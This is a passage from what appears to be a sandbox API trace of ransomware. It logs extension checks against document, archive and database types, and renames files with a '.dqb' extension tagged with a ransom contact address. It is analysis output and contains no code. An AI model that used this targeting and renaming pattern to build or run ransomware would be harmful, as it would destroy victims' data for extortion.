(lpString=".xls") returned 4 [0270.581] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString=".xlsx") returned 5 [0270.581] lstrcmpiW (lpString1=".xlsx", lpString2="e.xml") returned -1 [0270.581] lstrlenW (lpString=".ppt") returned 4 [0270.581] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.581] lstrlenW (lpString=".zip") returned 4 [0270.581] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.581] lstrlenW (lpString=".rar") returned 4 [0270.581] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString=".bz2") returned 4 [0270.581] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString=".7z") returned 3 [0270.581] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.581] lstrlenW (lpString=".dbf") returned 4 [0270.581] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.581] lstrlenW (lpString=".1cd") returned 4 [0270.581] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.581] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred\\oskpredbase.xml") returned 88 [0270.581] lstrlenW (lpString=".jpg") returned 4 [0270.581] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.582] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.582] lstrlenW (lpString="oskpred.xml") returned 11 [0270.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0270.582] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=215) returned 1 [0270.582] CloseHandle (hObject=0x314) returned 1 [0270.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml")) returned 0x20 [0270.582] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.582] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\oskpred.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.582] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.582] lstrlenW (lpString=".doc") returned 4 [0270.582] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.582] lstrlenW (lpString=".docx") returned 5 [0270.582] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0270.582] lstrlenW (lpString=".pdf") returned 4 [0270.582] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.582] lstrlenW (lpString=".xls") returned 4 [0270.582] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.582] lstrlenW (lpString=".xlsx") returned 5 [0270.583] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0270.583] lstrlenW (lpString=".ppt") returned 4 [0270.583] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.583] lstrlenW (lpString=".zip") returned 4 [0270.583] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.583] lstrlenW (lpString=".rar") returned 4 [0270.583] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString=".bz2") returned 4 [0270.583] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString=".7z") returned 3 [0270.583] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.583] lstrlenW (lpString=".dbf") returned 4 [0270.583] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.583] lstrlenW (lpString=".1cd") returned 4 [0270.583] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.583] lstrlenW (lpString=".jpg") returned 4 [0270.583] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.583] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.583] lstrlenW (lpString=".doc") returned 4 [0270.583] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString=".docx") returned 5 [0270.583] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0270.583] lstrlenW (lpString=".pdf") returned 4 [0270.583] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString=".xls") returned 4 [0270.583] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.583] lstrlenW (lpString=".xlsx") returned 5 [0270.583] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0270.584] lstrlenW (lpString=".ppt") returned 4 [0270.584] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.584] lstrlenW (lpString=".zip") returned 4 [0270.584] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.584] lstrlenW (lpString=".rar") returned 4 [0270.584] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.584] lstrlenW (lpString=".bz2") returned 4 [0270.584] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.584] lstrlenW (lpString=".7z") returned 3 [0270.584] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.584] lstrlenW (lpString=".dbf") returned 4 [0270.584] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0270.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.584] lstrlenW (lpString=".1cd") returned 4 [0270.584] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0270.584] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\oskpred.xml") returned 76 [0270.584] lstrlenW (lpString=".jpg") returned 4 [0270.584] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0270.584] lstrcmpiW (lpString1=".xml", lpString2=".dqb") returned 1 [0270.584] lstrlenW (lpString="ea-sym.xml") returned 10 [0270.584] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0270.585] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=749) returned 1 [0270.585] CloseHandle (hObject=0x314) returned 1 [0270.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml")) returned 0x20 [0270.585] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.585] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0270.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0270.585] lstrlenW (lpString=".doc") returned 4 [0270.585] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0270.585] lstrlenW (lpString=".docx") returned 5 [0270.585] lstrcmpiW (lpString1=".docx", lpString2="m.xml") returned -1 [0270.585] lstrlenW (lpString=".pdf") returned 4 [0270.585] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0270.585] lstrlenW (lpString=".xls") returned 4 [0270.585] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0270.585] lstrlenW (lpString=".xlsx") returned 5 [0270.585] lstrcmpiW (lpString1=".xlsx", lpString2="m.xml") returned -1 [0270.585] lstrlenW (lpString=".ppt") returned 4 [0270.585] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0270.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0270.585] lstrlenW (lpString=".zip") returned 4 [0270.585] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0270.585] lstrlenW (lpString=".rar") returned 4 [0270.585] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0270.585] lstrlenW (lpString=".bz2") returned 4 [0270.585] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0270.585] lstrlenW (lpString=".7z") returned 3 [0270.585] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0270.585] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\symbols\\ea-sym.xml") returned 83 [0270.587] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=1166) returned 1 [0270.587] CloseHandle (hObject=0x314) returned 1 [0270.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml")) returned 0x20 [0270.587] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0270.588] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\web\\webbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\web\\webbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0270.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0270.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0270.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0270.590] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0 [0272.020] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=153) returned 1 [0272.020] CloseHandle (hObject=0x31c) returned 1 [0272.020] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png")) returned 0x20 [0272.025] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.032] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\titlebuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.032] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.032] lstrlenW (lpString=".docx") returned 5 [0272.032] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0272.032] lstrlenW (lpString=".pdf") returned 4 [0272.032] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.032] lstrlenW (lpString=".xls") returned 4 [0272.032] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.032] lstrlenW (lpString=".xlsx") returned 5 [0272.032] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0272.032] lstrlenW (lpString=".ppt") returned 4 [0272.032] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.032] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.032] lstrlenW (lpString=".zip") returned 4 [0272.032] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.032] lstrlenW (lpString=".rar") returned 4 [0272.032] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.032] lstrlenW (lpString=".bz2") returned 4 [0272.032] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.032] lstrlenW (lpString=".7z") returned 3 [0272.032] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.032] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.032] lstrlenW (lpString=".dbf") returned 4 [0272.032] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.032] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.032] lstrlenW (lpString=".1cd") returned 4 [0272.032] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.033] lstrlenW (lpString=".jpg") returned 4 [0272.033] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.033] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.080] lstrlenW (lpString=".doc") returned 4 [0272.080] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.080] lstrlenW (lpString=".docx") returned 5 [0272.080] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0272.080] lstrlenW (lpString=".pdf") returned 4 [0272.080] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.080] lstrlenW (lpString=".xls") returned 4 [0272.080] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.080] lstrlenW (lpString=".xlsx") returned 5 [0272.080] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0272.080] lstrlenW (lpString=".ppt") returned 4 [0272.080] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.080] lstrlenW (lpString=".zip") returned 4 [0272.080] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.080] lstrlenW (lpString=".rar") returned 4 [0272.080] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.080] lstrlenW (lpString=".bz2") returned 4 [0272.080] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.080] lstrlenW (lpString=".7z") returned 3 [0272.080] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.080] lstrlenW (lpString=".dbf") returned 4 [0272.080] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.080] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.081] lstrlenW (lpString=".1cd") returned 4 [0272.081] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.081] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\TitleButtonIcon.png") returned 75 [0272.081] lstrlenW (lpString=".jpg") returned 4 [0272.081] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.081] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0272.081] lstrlenW (lpString="PreviousMenuButtonIcon.png") returned 26 [0272.081] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.081] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=3819) returned 1 [0272.081] CloseHandle (hObject=0x31c) returned 1 [0272.081] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png")) returned 0x20 [0272.082] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.089] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\previousmenubuttonicon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0272.089] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.089] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.089] lstrlenW (lpString=".doc") returned 4 [0272.089] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.089] lstrlenW (lpString=".docx") returned 5 [0272.089] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0272.089] lstrlenW (lpString=".pdf") returned 4 [0272.089] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.089] lstrlenW (lpString=".xls") returned 4 [0272.089] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.089] lstrlenW (lpString=".xlsx") returned 5 [0272.089] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0272.089] lstrlenW (lpString=".ppt") returned 4 [0272.090] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.090] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.090] lstrlenW (lpString=".zip") returned 4 [0272.090] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.090] lstrlenW (lpString=".rar") returned 4 [0272.090] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.090] lstrlenW (lpString=".bz2") returned 4 [0272.090] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.090] lstrlenW (lpString=".7z") returned 3 [0272.090] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.090] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.090] lstrlenW (lpString=".dbf") returned 4 [0272.090] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.090] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.090] lstrlenW (lpString=".1cd") returned 4 [0272.090] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.090] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.090] lstrlenW (lpString=".jpg") returned 4 [0272.090] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.090] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.090] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.090] lstrlenW (lpString=".doc") returned 4 [0272.090] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.090] lstrlenW (lpString=".docx") returned 5 [0272.090] lstrcmpiW (lpString1=".docx", lpString2="n.png") returned -1 [0272.090] lstrlenW (lpString=".pdf") returned 4 [0272.090] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.090] lstrlenW (lpString=".xls") returned 4 [0272.090] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.090] lstrlenW (lpString=".xlsx") returned 5 [0272.090] lstrcmpiW (lpString1=".xlsx", lpString2="n.png") returned -1 [0272.091] lstrlenW (lpString=".ppt") returned 4 [0272.091] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.091] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.091] lstrlenW (lpString=".zip") returned 4 [0272.091] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.091] lstrlenW (lpString=".rar") returned 4 [0272.091] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.091] lstrlenW (lpString=".bz2") returned 4 [0272.091] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.091] lstrlenW (lpString=".7z") returned 3 [0272.091] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.091] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.091] lstrlenW (lpString=".dbf") returned 4 [0272.091] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.091] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.091] lstrlenW (lpString=".1cd") returned 4 [0272.091] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.091] lstrlenW (lpString="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\PreviousMenuButtonIcon.png") returned 77 [0272.091] lstrlenW (lpString=".jpg") returned 4 [0272.091] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.091] lstrcmpiW (lpString1=".wmv", lpString2=".dqb") returned 1 [0272.091] lstrlenW (lpString="SportsMainBackground.wmv") returned 24 [0272.091] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0272.091] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2e8ff1c | out: lpFileSize=0x2e8ff1c*=5477696) returned 1 [0272.092] CloseHandle (hObject=0x31c) returned 1 [0272.092] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv")) returned 0x20 [0272.092] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SportsMainBackground.wmv.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\sportsmainbackground.wmv.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.092] MoveFileW (lpExistingFileName="C:\\Program 